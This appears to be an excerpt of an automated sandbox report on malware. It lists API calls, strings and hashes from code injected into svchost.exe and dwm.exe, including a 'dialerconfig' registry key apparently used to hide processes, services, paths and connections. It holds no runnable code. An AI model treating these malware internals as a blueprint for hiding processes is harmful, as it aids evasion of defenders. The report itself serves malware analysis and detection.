Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F0276110AB
RegEnumValueW.ADVAPI32 ref: 000001F02761110E
GetProcessHeap.KERNEL32 ref: 000001F027611155
HeapAlloc.KERNEL32 ref: 000001F027611163
GetProcessHeap.KERNEL32 ref: 000001F027611187
HeapFree.KERNEL32 ref: 000001F027611195

Strings

d, xrefs: 000001F0276110CE

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 05b88d8945427ddd246e36ae75a8c4ba20eccb38a3a7dae10e458720b97f3d80
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 77419033614B8197EB66CF62E44D7EAB7A1F388B84F448125DB8907B55DF38C164CB10

Function 000001F027619804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 000001F027619889
GetLastError.KERNEL32 ref: 000001F027619897
LoadLibraryExW.KERNEL32 ref: 000001F0276198C1
FreeLibrary.KERNEL32 ref: 000001F027619907
GetProcAddress.KERNEL32 ref: 000001F027619913

Strings

api-ms-, xrefs: 000001F0276198A9

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 412014ecd3daabd3475624c40ff682eaafffb02cece36363ccd594d64553e659
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: B1319E31312B9291EF53DB16A80C7F96398BB0CBA0F994935AD2D4A786DF38C4458320

Function 000001F027621B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 000001F027621BCD
GetLastError.KERNEL32 ref: 000001F027621BD9
CloseHandle.KERNEL32 ref: 000001F027621BF1
CreateFileW.KERNEL32 ref: 000001F027621C1C
WriteConsoleW.KERNEL32 ref: 000001F027621C3B

Strings

CONOUT$, xrefs: 000001F027621BFD

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 05eb99dbe028fa855020d5fb138734ec245ccd26a538efccdc413b4789f7cb83
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: A2119D31714B4186EB928B03E84C3A972A0F38CFE4F140235EE5D877A6CF38C9048750

Function 000001F027615C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F027615C4B
GetThreadContext.KERNEL32 ref: 000001F027615DB5

Part of subcall function 000001F027615A40: GetCurrentThreadId.KERNEL32 ref: 000001F027615A44

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: ed55551250f9abba239af1599b1bb7fe933e74c4abe4918d54a7f72f31bead7b
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 16D17F76204B9985DF719B1AE49C3AAB7A0F3CCB84F544126EE8D47BA6DF38C541CB10

Function 000001F0276130B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F0276130D7
HeapAlloc.KERNEL32 ref: 000001F0276130EA
StrCmpNIW.SHLWAPI ref: 000001F02761316B
GetProcessHeap.KERNEL32 ref: 000001F0276131D1
HeapFree.KERNEL32 ref: 000001F0276131DF

Strings

dialer, xrefs: 000001F027613164

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 715419c192bb809a15ea80e0bc9697393aa3ce975b4fd6a13ad6700885e86c36
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: F831AD32701B5282EF57CF57A80D2B973A0FB48B84F4D80309E8E07B56EB38C4A18710

Function 000001F027611A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001F027611A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000001F027611A58
PathFindFileNameW.SHLWAPI ref: 000001F027611A67
lstrlenW.KERNEL32 ref: 000001F027611A73
StrCpyW.SHLWAPI ref: 000001F027611A86
CloseHandle.KERNEL32 ref: 000001F027611A94

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 051f7deb2553346fd71f3f66225ea82d6d0eb3540e6d6572cd6929e21988e1b3
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: CB015731300A8696EB55DB13A86C3A963A1F78CFC0F888035CE8D43B56DF39C9898320

Function 000001F0276137AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001F0276137C8
GetCurrentProcess.KERNEL32 ref: 000001F0276137D6
VirtualProtectEx.KERNEL32 ref: 000001F0276137F8
GetCurrentProcess.KERNEL32 ref: 000001F027613819
VirtualProtectEx.KERNEL32 ref: 000001F02761383A
TerminateThread.KERNEL32 ref: 000001F027613849

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 614a8cc3a4d8035bdb76e7554972262afda3ae373ee47a123f2fa1de5b99c486
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: FC111B7571174286EFA69B62E40D7A667A0BB5CB85F080435CE5D47767EF3CC4088B24

Function 000001F027611AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001F027611AD8
StrCmpNIW.SHLWAPI ref: 000001F027611AF2
lstrlenW.KERNEL32 ref: 000001F027611B01
StrCpyW.SHLWAPI ref: 000001F027611B16

Strings

\\?\, xrefs: 000001F027611AE6

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 896fa5cdf56122005822c849ae728db11d48aca383cceedc3fdadeebfaea80ea
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 72F0443230464292EF618B21F49C3A96760F748B88F888030CE4D46656DF6CC648C710

Function 000001F027613200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001F027613222
StrCpyW.SHLWAPI ref: 000001F027613232
StrCatW.SHLWAPI ref: 000001F02761323E
PathCombineW.SHLWAPI ref: 000001F02761324C

Strings

\\.\pipe\, xrefs: 000001F027613218

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 12d817fb98ab98530911da1243089bdd5e2b1874c2d9932a63a6d1c8d66121ee
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: FFF05830304B8292EF819B13B90D1A9A220BB8CFD0F4C8131AE9A07B2BCF28C5818310

Function 000001F02761A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001F02761A154
GetProcAddress.KERNEL32 ref: 000001F02761A16A
FreeLibrary.KERNEL32 ref: 000001F02761A187

Strings

mscoree.dll, xrefs: 000001F02761A14B
CorExitProcess, xrefs: 000001F02761A163

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 4bfbf02fe615d12f47e754b17dbedda9d2ff865e4dd73407dcf8c6b3b2b9590c
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 27F0FE7131164691EF964B61E88D3B52760BB4CB90F8820399D4B45667DF28C58CC734

Function 000001F027613878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001F027613886
GetCurrentProcess.KERNEL32 ref: 000001F0276138B4
VirtualProtectEx.KERNEL32 ref: 000001F0276138D6
GetCurrentProcess.KERNEL32 ref: 000001F0276138F4
VirtualProtectEx.KERNEL32 ref: 000001F027613915

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 3f388ef9d7ca36bcf002eebfb7e1dee43f0d2356baf41d1914770b685fe09b0b
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 8D113C3A704B4282EF569B22F40C6A976A1F74CB84F484439DE8E07B96EF3DC904C724

Function 000001F027618400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001F02761840B
RtlLookupFunctionEntry.NTDLL ref: 000001F027618425
RtlVirtualUnwind.NTDLL ref: 000001F02761845C

Strings

NtQuerySystemInformation, xrefs: 000001F027618402

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual
String ID: NtQuerySystemInformation
API String ID: 2154932578-2549949336
Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction ID: e698f140a5967568df19400b1fea0ea1b076e74ff741fdf004768ec056d3a9a1
Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction Fuzzy Hash: 43F0AF7721878182EB518B16F8483BA6361F78DBA0F480134EE8E86B49DF38C589CB10

Function 000001F0276114B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F0276114D5
HeapFree.KERNEL32 ref: 000001F0276114E4
GetProcessHeap.KERNEL32 ref: 000001F0276114F0
HeapFree.KERNEL32 ref: 000001F0276114FF
GetProcessHeap.KERNEL32 ref: 000001F02761152A

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: e0e9ba7901fbb51452903b6ab99e7061dc1d8ea017eb5fa8dd1a86ca643d3006
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: E3112E31614B8992EB569F67A84C26A7360F78DF84F084139DF9A03716DF38C051CB50

Function 000001F027620860 Relevance: 6.2, APIs: 4, Instructions: 202COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000001F027620960
GetLastError.KERNEL32 ref: 000001F0276209EA

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 5ea84992f39011e9a5c8d2da058ca6cf7e4212114c2842ab8d75388b89b0e291
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: C681AD32A1065689FFD29B65984C3FD36A1F74CB88F944136DE0A53B9BDB388842C330

Function 000001F027617A40 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001F027617A6C
GetCurrentThreadId.KERNEL32 ref: 000001F027617A7A
GetCurrentProcessId.KERNEL32 ref: 000001F027617A86
QueryPerformanceCounter.KERNEL32 ref: 000001F027617A96

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction ID: ca216e2e7cf83f0c76c13a56a3a4701868f077c4ef54d1e64fdb160b8613109e
Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction Fuzzy Hash: FE112A32300F428AEF518F61E85D3A833A4F71D75CF441A31EEAD467A6DB38C1A58390

Function 000001F0276126F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F0276127D4
StrCpyW.SHLWAPI ref: 000001F0276127ED

Strings

\\.\pipe\, xrefs: 000001F0276127DF

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 06db4fdc41d634498f54957276acab47bc43d9accb9158981a9122bdfacfc34b
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: ED719F323047864AEF669A2A995C3FB6691F74CB84F844436DE4E43B9ADF35C9048B50

Function 000001F0276124DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F0276125C3
StrCpyW.SHLWAPI ref: 000001F0276125DA

Strings

\\.\pipe\, xrefs: 000001F0276125CE

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: f2d1f905dbd20a665483f8a3ba5d59f19f14e1e658e4e196279b6d51a5342bfe
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 8751A33230878246EF669B2A955C3FB6651F389B80F844035CD8E13B9BDB39C4118FA0

Function 000001F0276190F5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

RtlUnwindEx.NTDLL ref: 000001F0276191E7

Strings

f, xrefs: 000001F027619116
csm, xrefs: 000001F02761917E

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Unwind
String ID: csm$f
API String ID: 3419175465-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 8508c58bd7788d07c1145e59ca5bbf8e24b4e3fe7d4f74a0b167d1faecced3da
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 2451B0327217828AEF56CF15E44CBA93795F348B88F928130DE0E5778ADB75D881C720

Function 000001F027620604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001F02762071B
GetLastError.KERNEL32 ref: 000001F02762073D

Strings

U, xrefs: 000001F0276206C7

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 13f8b7aac6d598e6da12296cb5b7832669a4a4df737ddc7cca1fd6f324f3f973
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 9F419F72314A8185EB619F25E44C3EAB7A1F39C784F444135EE8D87B9ADB38C541CB60

Function 000001F0276190D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

RtlUnwindEx.NTDLL ref: 000001F0276191E7

Strings

f, xrefs: 000001F027619116
csm, xrefs: 000001F02761917E

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Unwind
String ID: csm$f
API String ID: 3419175465-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 69435b4408430f2be2dddd693d9c8b1702089a255d7ec34e5b1050a474663d5d
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: F731C4322107819AEF16DF12E84C7A937A5F748B88F568124AE4E07797DB38C984C714

Function 000001F0276194A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001F0276194E8
RaiseException.KERNEL32 ref: 000001F02761952E

Strings

csm, xrefs: 000001F02761951B

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 2cbc9caeb1e91552346287051453d8a8b1c787514decf881763449a2d89ba5b6
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: DA111C32219B8182EF628F15E4483A977A5F788B98F5C4221DF8D07B6ADF3CC555CB00

Function 000001F027611D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F027611D9B
HeapAlloc.KERNEL32 ref: 000001F027611DAA
GetProcessHeap.KERNEL32 ref: 000001F027611E1E
HeapFree.KERNEL32 ref: 000001F027611E2C

Memory Dump Source

Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: d56f050d774505197d4e7eb20a5d5a691077f7021d0a3129742ab9fc6c295e5f
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 57218332704B9182EF568F5AE40C2AAB3A0FB88B94F494124DE8C47B26EF78C5428710

Analysis Process: dwm.exePID: 1152, Parent PID: 8464COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	95.9%
Signature Coverage:	0%
Total number of Nodes:	97
Total number of Limit Nodes:	13

Executed Functions

Function 000002311E401650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002311E40165B
HeapAlloc.KERNEL32 ref: 000002311E40166A

Part of subcall function 000002311E401274: GetProcessHeap.KERNEL32 ref: 000002311E40127A
Part of subcall function 000002311E401274: HeapAlloc.KERNEL32 ref: 000002311E401289
Part of subcall function 000002311E401274: GetProcessHeap.KERNEL32 ref: 000002311E4012A3
Part of subcall function 000002311E401274: HeapAlloc.KERNEL32 ref: 000002311E4012B4

RegOpenKeyExW.ADVAPI32 ref: 000002311E4016DA
RegOpenKeyExW.ADVAPI32 ref: 000002311E401707
RegCloseKey.ADVAPI32 ref: 000002311E401721
RegOpenKeyExW.ADVAPI32 ref: 000002311E401741
RegCloseKey.ADVAPI32 ref: 000002311E40175C
RegOpenKeyExW.ADVAPI32 ref: 000002311E40177C
RegCloseKey.ADVAPI32 ref: 000002311E401797
RegOpenKeyExW.ADVAPI32 ref: 000002311E4017B7
RegCloseKey.ADVAPI32 ref: 000002311E4017D2
RegOpenKeyExW.ADVAPI32 ref: 000002311E4017F2
RegCloseKey.ADVAPI32 ref: 000002311E40180D
RegOpenKeyExW.ADVAPI32 ref: 000002311E40182D
RegCloseKey.ADVAPI32 ref: 000002311E401848
RegOpenKeyExW.ADVAPI32 ref: 000002311E401868
RegCloseKey.ADVAPI32 ref: 000002311E401883
RegOpenKeyExW.ADVAPI32 ref: 000002311E4018A3
RegCloseKey.ADVAPI32 ref: 000002311E4018BE
RegCloseKey.ADVAPI32 ref: 000002311E4018C8

Part of subcall function 000002311E4012C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002311E401326
Part of subcall function 000002311E4012C8: GetProcessHeap.KERNEL32 ref: 000002311E401334
Part of subcall function 000002311E4012C8: HeapAlloc.KERNEL32 ref: 000002311E401345
Part of subcall function 000002311E4012C8: RegEnumValueW.ADVAPI32 ref: 000002311E4013A1
Part of subcall function 000002311E4012C8: GetProcessHeap.KERNEL32 ref: 000002311E4013E9
Part of subcall function 000002311E4012C8: HeapAlloc.KERNEL32 ref: 000002311E4013F7
Part of subcall function 000002311E4012C8: GetProcessHeap.KERNEL32 ref: 000002311E40141B
Part of subcall function 000002311E4012C8: HeapFree.KERNEL32 ref: 000002311E401429
Part of subcall function 000002311E4012C8: lstrlenW.KERNEL32 ref: 000002311E401432
Part of subcall function 000002311E4012C8: GetProcessHeap.KERNEL32 ref: 000002311E401440
Part of subcall function 000002311E4012C8: HeapAlloc.KERNEL32 ref: 000002311E40144E

Strings

udp, xrefs: 000002311E40189C
tcp_local, xrefs: 000002311E401826
service_names, xrefs: 000002311E4017EB
process_names, xrefs: 000002311E401775
startup, xrefs: 000002311E4016FD
paths, xrefs: 000002311E4017B0
pid, xrefs: 000002311E40173A
SOFTWARE\dialerconfig, xrefs: 000002311E4016BA
tcp_remote, xrefs: 000002311E401861

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 1d18a3dcf9cec88600b4f2f2ab85457d101ae6e11dee5f1a4885384f7e0e1ee2
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 8E71F736710A5086EB10DFA5E8586D92BE4FB84F8CF011125DB8D97F29DFB8C665E310

Function 000002311E405C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002311E405C4B
GetThreadContext.KERNEL32 ref: 000002311E405DB5

Part of subcall function 000002311E405A40: GetCurrentThreadId.KERNEL32 ref: 000002311E405A44

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
